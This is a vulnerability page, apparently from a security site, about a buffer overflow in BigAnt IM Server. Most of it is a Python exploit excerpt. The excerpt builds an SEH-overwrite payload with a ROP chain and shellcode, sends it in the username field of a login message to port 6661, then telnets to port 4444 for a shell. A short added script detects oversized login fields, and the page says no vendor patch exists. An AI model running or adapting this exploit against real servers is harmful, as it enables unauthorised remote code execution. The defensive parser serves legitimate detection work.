BigAnt IM Server Buffer Overflow Vulnerability (2)

import socket
import struct
import subprocess
import sys
import time

# host, rop_gadgets (the ROP chain) and sc (the shellcode) are defined earlier in
# the original script and are not part of this excerpt.

front = "A" * 684
seh = struct.pack('<L', 0x0f9eeb8a)  # ADD ESP,1004 [expsrv.dll]
back = "C" * 1592
stack_adjust = "\x81\xc4\x24\xfa\xff\xff"  # ADD ESP,-0x5DC: move ESP back 1500 bytes
junk = "D" * (4000 - (len(front) + len(seh) + len(back) + len(rop_gadgets) + len(stack_adjust) + len(sc)))

sploit = front + seh + back + rop_gadgets + stack_adjust + sc + junk
print "[+] Sending pwnag3 to " + str(host)

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, 6661))
    # DDNF login request; the oversized "username" field carries the payload
    s.send(""
           "DDNF 17\n"
           "classid: 100\n"
           "cmdid: 1\n"
           "objid: 1\n"
           "rootid: 3\n"
           "userid: 8\n"
           "username: " + sploit +
           "\r\n\r\n")
    time.sleep(1)
except:
    print "[-] There was a problem"
    sys.exit()

print "[+] Getting your shell. "
time.sleep(3)
subprocess.Popen("telnet " + host + " 4444", shell=True).wait()
print "[*] Done."
s.close()
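As an added defender-side example (not part of the original exploit or of BigAnt's code), the following Python parses a DDNF login message of the shape sent above and reports header fields whose value exceeds a size limit; the 256-byte limit, the function names and the sample messages are assumptions.

```python
# Added example: parse a BigAnt DDNF login message and flag oversized header
# fields, the condition the exploit above relies on. MAX_FIELD_LEN is an
# assumed threshold chosen for illustration, not a value from the product.

MAX_FIELD_LEN = 256


def parse_ddnf(payload):
    """Split a DDNF message into its command line and header fields.

    Returns (command, fields) where fields maps header name -> value.
    Raises ValueError if the message does not look like DDNF.
    """
    if isinstance(payload, bytes):
        payload = payload.decode("latin-1")
    # The request ends with an empty line; ignore anything after it.
    body = payload.split("\r\n\r\n", 1)[0]
    lines = body.split("\n")
    if not lines or not lines[0].startswith("DDNF "):
        raise ValueError("not a DDNF message")
    fields = {}
    for line in lines[1:]:
        if not line.strip():
            continue
        name, sep, value = line.partition(":")
        if not sep:
            raise ValueError("malformed header line: %r" % line)
        fields[name.strip()] = value.strip()
    return lines[0].strip(), fields


def oversized_fields(payload, limit=MAX_FIELD_LEN):
    """Return the names of header fields whose value is longer than `limit`."""
    _, fields = parse_ddnf(payload)
    return sorted(name for name, value in fields.items() if len(value) > limit)


# Constructed sample messages: a normal login and one shaped like the exploit.
BENIGN = ("DDNF 17\nclassid: 100\ncmdid: 1\nobjid: 1\nrootid: 3\n"
          "userid: 8\nusername: alice\r\n\r\n")
SUSPICIOUS = BENIGN.replace("username: alice", "username: " + "A" * 4000)

if __name__ == "__main__":
    for label, msg in (("benign", BENIGN), ("suspicious", SUSPICIOUS)):
        print(label, oversized_fields(msg))
```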

Recommendation:
--------------------------------------------------------------------------------
Vendor patch:
 
bigantsoft
 ----------
The vendor has not yet released a patch or upgrade; users of this software are advised to monitor the vendor's homepage for the latest version:
 

Content copyright notice: unless otherwise stated, all articles are original to this site.

When reprinting, cite the source: http://www.heiqu.com/ppxpp.html